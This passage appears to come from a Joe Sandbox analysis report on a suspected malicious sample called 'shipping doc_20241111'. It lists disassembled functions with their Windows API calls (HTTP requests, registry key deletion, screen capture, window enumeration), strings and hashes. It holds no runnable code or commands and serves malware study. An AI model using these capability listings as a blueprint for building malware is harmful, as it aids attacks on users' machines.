HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FBC4A2
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FBC4FA
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FBC50E
InternetCloseHandle.WININET(00000000), ref: 00FBC519

Strings

, xrefs: 00FBC493

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 760898def5c38fb016ac6b6d34438624f890689c9c1676113f2fa7f0066801f0
Instruction ID: 6a74068d7821bcc636e12ccdcd8a51e261aff65c32b197db6a1c7622053e4e88
Opcode Fuzzy Hash: 760898def5c38fb016ac6b6d34438624f890689c9c1676113f2fa7f0066801f0
Instruction Fuzzy Hash: B05127B1501609AFDB219F628C88ABB7BB8FB08754F04851AF94596250D734EA44EFA0

Function 00FD8461 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00FD8484
GetFileSize.KERNEL32(00000000,00000000), ref: 00FD8494
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00FD849F
CloseHandle.KERNEL32(00000000), ref: 00FD84AC
GlobalLock.KERNEL32(00000000), ref: 00FD84BA
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00FD84C9
GlobalUnlock.KERNEL32(00000000), ref: 00FD84D2
CloseHandle.KERNEL32(00000000), ref: 00FD84D9
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FD84EA
OleLoadPicture.OLEAUT32(?,00000000,00000000,00FDFC54,?), ref: 00FD8503
GlobalFree.KERNEL32(00000000), ref: 00FD8513
GetObjectW.GDI32(?,00000018,000000FF), ref: 00FD8533
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00FD8563
DeleteObject.GDI32(00000000), ref: 00FD858B
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FD85A1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 0c66a62cccb1857accf032b5deaeb7e58311f3e64fe9691afd129c2f9d3857a2
Instruction ID: 8a2f826326eaff04b1929141d5201b1310336ea739e6d98de0644045812f2734
Opcode Fuzzy Hash: 0c66a62cccb1857accf032b5deaeb7e58311f3e64fe9691afd129c2f9d3857a2
Instruction Fuzzy Hash: 4F415A75601209AFDB11DFA4DC48EAA7BBAFF89761F04805AF915D7260DB309901EBA0

Function 00FB13DB Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00FB1420
VariantCopy.OLEAUT32(?,?), ref: 00FB1429
VariantClear.OLEAUT32(?), ref: 00FB1435
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00FB1519
VarR8FromDec.OLEAUT32(?,?), ref: 00FB1575
VariantInit.OLEAUT32(?), ref: 00FB1626
SysFreeString.OLEAUT32(?), ref: 00FB16AA
VariantClear.OLEAUT32(?), ref: 00FB16F6
VariantClear.OLEAUT32(?), ref: 00FB1705
VariantInit.OLEAUT32(00000000), ref: 00FB1741

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00FB1543
Default, xrefs: 00FB15CD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 26bcd6365e6de2cf494e2bba10dc91c2519647ee244e1c53bdc20e087effc201
Instruction ID: c0da08af3d980b9c128824ced474eecdbb55d555916687524d7466bbd2430a27
Opcode Fuzzy Hash: 26bcd6365e6de2cf494e2bba10dc91c2519647ee244e1c53bdc20e087effc201
Instruction Fuzzy Hash: F8D11132A00215DBDB10DF66D8A4BB9B7B5BF06710F64805AE919AB181CB34EC44FFA1

Function 00FCB535 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FCC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCB5D5,?,?), ref: 00FCC8DC
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC918
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC98F
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC9C5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCB61B
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCB699
RegDeleteValueW.ADVAPI32(?,?), ref: 00FCB731
RegCloseKey.ADVAPI32(?), ref: 00FCB7A5
RegCloseKey.ADVAPI32(?), ref: 00FCB7C3
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00FCB819
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FCB82B
RegDeleteKeyW.ADVAPI32(?,?), ref: 00FCB849
FreeLibrary.KERNEL32(00000000), ref: 00FCB8AA
RegCloseKey.ADVAPI32(00000000), ref: 00FCB8BB

Strings

advapi32.dll, xrefs: 00FCB814
RegDeleteKeyExW, xrefs: 00FCB825

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b13332b666c95b755859fa0a9706b8de8ef4b3b385398646d8fdb95e021b4c63
Instruction ID: 6db71d948f6c59471ad697a524a7828512d3eb4f50758ac14f97c309e87f7fdc
Opcode Fuzzy Hash: b13332b666c95b755859fa0a9706b8de8ef4b3b385398646d8fdb95e021b4c63
Instruction Fuzzy Hash: D6C1D235604202AFD710DF24C996F1ABBE5BF84318F14849CF8598B3A2CB75ED46EB81

Function 00FC2483 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FC24FF
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00FC250F
CreateCompatibleDC.GDI32(?), ref: 00FC251B
SelectObject.GDI32(00000000,?), ref: 00FC2528
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00FC2594
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00FC25D3
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00FC25F7
SelectObject.GDI32(?,?), ref: 00FC25FF
DeleteObject.GDI32(?), ref: 00FC2608
DeleteDC.GDI32(?), ref: 00FC260F
ReleaseDC.USER32(00000000,?), ref: 00FC261A

Strings

(, xrefs: 00FC25B4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f669aa38947838959995415555e5afca31048556cb3f43b7e15047a003ce900e
Instruction ID: 775ccca953c32955262c3d80f681f947842041ad28668ac1e4aafbfb0b0a8d96
Opcode Fuzzy Hash: f669aa38947838959995415555e5afca31048556cb3f43b7e15047a003ce900e
Instruction Fuzzy Hash: A561E275D0121AEFCF04CFA8C985EAEBBB6FF48710F24852AE955A7210D734A941DF90

Function 00F7D9FD Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00F7DA41

Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D5F9
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D60B
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D61D
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D62F
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D641
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D653
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D665
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D677
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D689
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D69B
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D6AD
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D6BF
Part of subcall function 00F7D5DC: _free.LIBCMT ref: 00F7D6D1

_free.LIBCMT ref: 00F7DA36

Part of subcall function 00F72958: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000), ref: 00F7296E
Part of subcall function 00F72958: GetLastError.KERNEL32(00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000,00000000), ref: 00F72980

_free.LIBCMT ref: 00F7DA58
_free.LIBCMT ref: 00F7DA6D
_free.LIBCMT ref: 00F7DA78
_free.LIBCMT ref: 00F7DA9A
_free.LIBCMT ref: 00F7DAAD
_free.LIBCMT ref: 00F7DABB
_free.LIBCMT ref: 00F7DAC6
_free.LIBCMT ref: 00F7DAFE
_free.LIBCMT ref: 00F7DB05
_free.LIBCMT ref: 00F7DB22
_free.LIBCMT ref: 00F7DB3A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 73d239dc3dc1056d58a7fe85080217ff1ce652ac2dc6c83f777851d5a0113117
Instruction ID: 077dd3c73103295e3237686a6ec2cafe7ffa6f22ebbb9de3591e25624638341c
Opcode Fuzzy Hash: 73d239dc3dc1056d58a7fe85080217ff1ce652ac2dc6c83f777851d5a0113117
Instruction Fuzzy Hash: 49314A71A042069FEB20AA39DC45B56B3F9BF54320F94842BE54DD7192DB38AD81E712

Function 00FA359E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FA35DF
_wcslen.LIBCMT ref: 00FA35EA
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FA36DA
GetClassNameW.USER32(?,?,00000400), ref: 00FA374F
GetDlgCtrlID.USER32(?), ref: 00FA37A5
GetWindowRect.USER32(?,?), ref: 00FA37CA
GetParent.USER32(?), ref: 00FA37E8
ScreenToClient.USER32(00000000), ref: 00FA37EF
GetClassNameW.USER32(?,?,00000100), ref: 00FA3869
GetWindowTextW.USER32(?,?,00000400), ref: 00FA38A5

Strings

%s%u, xrefs: 00FA3677

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: ada3a7371b8ae84b23aabb88db61bef92daccbe9ca6254f3f2b684241cc496bb
Instruction ID: ae48450994d92362584aa4842b6af6fe5f0b2e14b48c2468b4c7f10aa7fe0f99
Opcode Fuzzy Hash: ada3a7371b8ae84b23aabb88db61bef92daccbe9ca6254f3f2b684241cc496bb
Instruction Fuzzy Hash: 17A1E2B2604306AFD718DF24C885FAAF7E8FF45350F008629F999D2190DB34EA45DB91

Function 00FA489C Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 255COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00FA48DC
GetWindowTextW.USER32(?,?,00000400), ref: 00FA4922
_wcslen.LIBCMT ref: 00FA4933
CharUpperBuffW.USER32(?,00000000), ref: 00FA493F
_wcsstr.LIBVCRUNTIME ref: 00FA4974
GetClassNameW.USER32(00000018,?,00000400), ref: 00FA49AC
GetWindowTextW.USER32(?,?,00000400), ref: 00FA49E9
GetClassNameW.USER32(00000018,?,00000400), ref: 00FA4A37
GetClassNameW.USER32(?,?,00000400), ref: 00FA4A71
GetWindowRect.USER32(?,?), ref: 00FA4AE1

Strings

ThumbnailClass, xrefs: 00FA49B7, 00FA4A42

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 50ef39559b281322ef16fa2643e4513ca5140af17097d04dc443b44d587c364f
Instruction ID: 0403352611b1d88e9453a71698a2d725c8925f6f54102b022af74901449da4ad
Opcode Fuzzy Hash: 50ef39559b281322ef16fa2643e4513ca5140af17097d04dc443b44d587c364f
Instruction Fuzzy Hash: 9091FFB14043059FDB04CF24C880BAA77E9FFCA364F04442AFD899A196DB74ED45EBA1

Function 00FCCB5B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCCB8B
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00FCCBB4
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FCCC6F

Part of subcall function 00FCCB5B: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00FCCBD1
Part of subcall function 00FCCB5B: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00FCCBE4
Part of subcall function 00FCCB5B: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FCCBF6
Part of subcall function 00FCCB5B: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00FCCC2C
Part of subcall function 00FCCB5B: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCCC4F

RegDeleteKeyW.ADVAPI32(?,?), ref: 00FCCC1A

Strings

advapi32.dll, xrefs: 00FCCBDF
RegDeleteKeyExW, xrefs: 00FCCBF0

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f69e59f791115f43d6c1781aeb1b6d7772b245c2add4467a6826cbfa48f972c3
Instruction ID: 83fa32a9ac202dea8ac90c03727ec703eb526271a585e12a720d8086cea498d5
Opcode Fuzzy Hash: f69e59f791115f43d6c1781aeb1b6d7772b245c2add4467a6826cbfa48f972c3
Instruction Fuzzy Hash: 0E316F72D4112ABBDB21CB61DD89EEFBB7CEF45750F000159E84AE2141DA349E45EAE0

Function 00FB3C3C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB3C5E
_wcslen.LIBCMT ref: 00FB3C8B
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FB3CBB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FB3CDC
RemoveDirectoryW.KERNEL32(?), ref: 00FB3CEC
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FB3D73
CloseHandle.KERNEL32(00000000), ref: 00FB3D7E
CloseHandle.KERNEL32(00000000), ref: 00FB3D89

Strings

\, xrefs: 00FB3C95
\??\%s, xrefs: 00FB3C79
:, xrefs: 00FB3CA0

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: cbee750a9a2113a189a4203e7e754e7f51b3a17590df9c71087ff18adb1b6bae
Instruction ID: cdec58f5cc0d38ec38cfde2fdfa563083ba93d97086c5f5b6e53e92b128e1f89
Opcode Fuzzy Hash: cbee750a9a2113a189a4203e7e754e7f51b3a17590df9c71087ff18adb1b6bae
Instruction Fuzzy Hash: D331E5B594011AABDB219FA1CC45FEB37BDEF49710F1041B6F509E2050EB749744DB64

Function 00FAE5CE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FAE5D2

Part of subcall function 00F5E465: timeGetTime.WINMM(?,?,00FAE5F2), ref: 00F5E469

Sleep.KERNEL32(0000000A), ref: 00FAE5FF
EnumThreadWindows.USER32(?,Function_0006E583,00000000), ref: 00FAE623
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FAE645
SetActiveWindow.USER32 ref: 00FAE664
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FAE672
SendMessageW.USER32(00000010,00000000,00000000), ref: 00FAE691
Sleep.KERNEL32(000000FA), ref: 00FAE69C
IsWindow.USER32 ref: 00FAE6A8
EndDialog.USER32(00000000), ref: 00FAE6B9

Strings

BUTTON, xrefs: 00FAE637

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 67984db5182846f01759f834f6569fda6120fb42d17836f2d102152a6bd1e977
Instruction ID: 9f9b1ee90aa5a5c1cdf17520bce6a09ecc899250214b9688403eed6a4229050b
Opcode Fuzzy Hash: 67984db5182846f01759f834f6569fda6120fb42d17836f2d102152a6bd1e977
Instruction Fuzzy Hash: 5D21C9F0240209AFEB215F30EC88B253B6AFB9A344F140815F945C22E5DB7EAC10FB64

Function 00FAE91A Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FAE97B
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FAE991
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FAE9A2
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FAE9B4
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FAE9C5

Strings

play PlayMe, xrefs: 00FAE9C0
open , xrefs: 00FAE92A
close PlayMe, xrefs: 00FAE98C, 00FAE9B9
alias PlayMe, xrefs: 00FAE954
play PlayMe wait, xrefs: 00FAE9AF
status PlayMe mode, xrefs: 00FAE976

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: b9e639864783b4f2f852beaed70c42cff12a999ae5e35a5f177e7902c0ea0801
Instruction ID: 07028a5acbeb7426ca59516af3275bcfc0f63964a9c5da89c9aeb26523d75108
Opcode Fuzzy Hash: b9e639864783b4f2f852beaed70c42cff12a999ae5e35a5f177e7902c0ea0801
Instruction Fuzzy Hash: 6E11A371A902697AE720B7A6CC4AEFF7F7CEBD2F10F0004297841A60D1EEA05905D5B0

Function 00FA5C1C Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00FA5C38
GetWindowRect.USER32(00000000,?), ref: 00FA5C51
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00FA5CAF
GetDlgItem.USER32(?,00000002), ref: 00FA5CBF
GetWindowRect.USER32(00000000,?), ref: 00FA5CD1
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00FA5D25
GetDlgItem.USER32(?,000003E9), ref: 00FA5D33
GetWindowRect.USER32(00000000,?), ref: 00FA5D45
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00FA5D87
GetDlgItem.USER32(?,000003EA), ref: 00FA5D9A
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FA5DB0
InvalidateRect.USER32(?,00000000,00000001), ref: 00FA5DBD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 15b69ac9e33882857d299e1ee1bec485863cd37babe541d666904623644cc115
Instruction ID: e833433be9d81dd1b30986c5c6b02d4659ba569e387666f924e6b283bdf0faf5
